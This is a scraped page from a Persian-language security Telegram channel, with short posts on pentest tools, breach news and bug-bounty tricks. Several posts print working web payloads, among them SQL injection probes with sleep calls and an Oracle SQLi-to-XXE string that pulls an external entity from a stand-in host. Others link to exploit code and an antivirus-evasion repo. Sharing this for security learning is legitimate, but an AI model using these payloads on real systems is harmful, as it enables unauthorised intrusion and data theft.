امنیت اطلاعات

گروه امنیت اطلاعات

https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA

@sec_nerd

16 views19:42

رایت آپ کشف آسیب پذیری های متعدد از نوع XSS و CSRF و XXE و رسیدن به RCE در پلتفرم متن باز LabKey Server

https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/

#writeup
#web
#pentest
#csrf
#xxe
#xss
#rce

@sec_nerd

Rhino Security Labs

Vulnerabilities Leading to RCE in LabKey Server

This post discusses 3 LabKey Server CVEs. The vulnerabilities, XSS, CSRF & XXE, can be used together to achieve RCE using intended functionality of the app.

471 views20:09

امنیت اطلاعات

بزرگترین دیتابیس کارتهای اعتباری شهروندان هندی در دارک نت به فروش گذاشته شد.
این دیتابیس حاوی اطلاعات کارتهای کردیت و دبیت بیش از 1.3 میلیون شهروند است که نزدیک به ۹۸ درصد آنان هندی هستند.
ارزش هر کارت ۱۰۰ دلار است بنابراین ارزش این دیتابیس ۱۳۰ میلیون دلار می باشد.
رکوردها حاوی اطلاعات magnetic strip نیز هستند که تمامی جزییات کارت از جمله مالک، شماره، تاریخ انقضا و احتمالا CVV و آدرس در آن وجود دارد.
این دیتابیس توسط گروه JokerStash یا همان Fin7 در دارک نت قرار داده شده است.

https://www.hackread.com/indian-credit-debit-card-records-on-dark-web/

#news
#breach
#india
#fin7

@sec_nerd

414 views17:58

امنیت اطلاعات

3:33

This media is not supported in your browser

VIEW IN TELEGRAM

ابزار blackwidow برای جمع آوری زیردامنه، ایمیل، شماره تلفن و عملیات فاز تمامی پارامترهای وبسایت برای آسیب پذیری های XXS , SQLI,RCE و path traversal

https://github.com/1N3/BlackWidow/

#web
#pentest
#sqli
#xss

@sec_nerd

882 views18:13

امنیت اطلاعات

https://sqlectron.github.io/

#sql
#tools

@sec_nerd

Sqlectron

Sqlectron - One single DB client for any relational DB

A simple and lightweight SQL client desktop/terminal with cross database and platform support.

425 views18:29

امنیت اطلاعات

This media is not supported in your browser

VIEW IN TELEGRAM

Apache Solr RCE via Velocity Template Injection

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

#apache
#rce
#exploit

@sec_nerd

371 views10:05

امنیت اطلاعات

استخراج تمامی آدرس های api از angularjs و فایلهای جاوا اسکریپت انگولار

curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

#web
#pentest
#angular

@sec_nerd

417 views10:12

امنیت اطلاعات

0:11

This media is not supported in your browser

VIEW IN TELEGRAM

ساخت دندان با استفاده از پرینت سه بعدی!

https://twitter.com/0xAmit/status/1189610151696850944

#shitty_future

@sec_nerd

397 views10:22

امنیت اطلاعات

لیست 3203 کلمه معمول مورد استفاده در APIها
مناسب برای عملیات Fuzzing

https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d

#api
#pentest
#web
#bugbounty

@sec_nerd

Gist

A list of 3203 common API endpoints and objects designed for fuzzing.

A list of 3203 common API endpoints and objects designed for fuzzing. - List of API endpoints & objects

838 views12:19

امنیت اطلاعات

محققان Cybereason کمپینی را شناسایی کردند که شرکتهای ارائه دهنده خدمات مخابراتی بزرگ را هدف قرار داده است.
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.

جزییات بیشتر و شرح فنی این حملات:

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

#news
#apt10
#telecom

@sec_nerd

Cybereason

Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers

In 2018, the Cybereason Nocturnus team identified Operation Soft Cell, an advanced, persistent attack targeting global telecommunications providers.

346 views18:04

امنیت اطلاعات

قفل (اثر انگشت) واتس اپ بالاخره برای اندروید فعال شد!

engt.co/33fWK8Y

#whatsapp
#android

@sec_nerd

380 views18:07

امنیت اطلاعات

منابع آنالیز بدافزار برای افراد تازه کار

https://github.com/0x4143/malware-gems/blob/master/README.md

#malware
#learning

@sec_nerd

GitHub

malware-gems/README.md at master · 0x4143/malware-gems

A not so awesome list of malware gems for aspiring malware analysts - 0x4143/malware-gems

409 views09:11

امنیت اطلاعات

آزمون آسیب پذیری Sql injection در apiها

Always start From : Boolean based >> Time based

{"id":"56456"} - OK
{"id":"56456 AND 1=1#"} -> OK
{"id":"56456 AND 1=2#"} -> ERROR
{"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC

#api
#web
#pentest
#sqli

@sec_nerd

866 viewsedited 09:12

امنیت اطلاعات

مجموعه ماشین های مجازی برای تقویت قابلیت های تست نفوذ به وب

https://pastebin.com/dmqmBTwz

#web
#pentest
#lab

@sec_nerd

345 views09:15

امنیت اطلاعات

ایجاد http server برای دسترسی سریعتر به فایلهای روی سرور و برخی آزمون های حملاتی مانند XXE

python 2:
python -m SimpleHTTPServer 80

python 3:
python3 -m http.server 80

#python
#trick

@sec_nerd

414 viewsedited 09:21

امنیت اطلاعات

تبدیل SQLi به XXE با استفاده از تابع xmltype

id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'

(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)

#sqli
#xxe
#web
#bugbounty
#pentest

@sec_nerd

588 views09:38

امنیت اطلاعات

Powershell based FUD

https://github.com/SpiderMate/Red-Teaming/tree/master/PS-Fud

#ps
#bypass
#av

@sec_nerd

531 views10:30

امنیت اطلاعات

CVE-2019-11510, Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability

#pulse
#network

@sec_nerd

397 views18:33

امنیت اطلاعات

ابزار Osmedeus برای شناسایی و کشف آسیب پذیری بر روی تارگت ها

https://github.com/j3ssie/Osmedeus

#tool
#pentest
#web

@sec_nerd

443 views16:29

امنیت اطلاعات

تیم rapid7 ماژول متاسپلویت مربوط به باگ معروف به Bluekeep که با شناسه ی CVE-2019-0708 ثبت شده است را منتشر کرد. https://github.com/rapid7/metasploit-framework/pull/12283 این آسیب پذیری در ویندوزهای ویستا، هفت،‌ ایکس پی، سرور ۲۰۰۳ و ۲۰۰۸ و در سرویس RDP به…

هکرها در حال استفاده وسیع از آسیب پذیری Bluekeep برای انتشار بدافزار استخراج کننده ارز دیجیتال هستند.
اکسپلویت مذکور توسط شرکتهای بزرگ با موفقیت ایجاد و آزمایش شده اما هنوز بصورت عمومی منتشر نشده است زیرا نزدیک به یک میلیون سیستم آسیب پذیر در برابر این حمله وجود دارد.
با وجود اینکه این آسیب پذیری قابلیت worm سازی را دارد اما اکسپلویت مورد بحث و مورد استفاده در استخراج ارز دیجیتال از نوع worm نیست.

اطلاعات بیشتر:
https://thehackernews.com/2019/11/bluekeep-rdp-vulnerability.html

#new
#bluekeep
#windows
#malware

@sec_nerd

407 views16:54

امنیت اطلاعات

آسیب پذیری اجرای دستور از راه دور بر روی Cisco Prime Infrastructure بدون نیاز به احراز هویت

توضیحات:
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

اکسپلویت:
https://srcincite.io/pocs/src-2019-0034.py.txt

#network
#cisco
#pentest

@sec_nerd

481 views17:56

About

Blog

Apps

Platform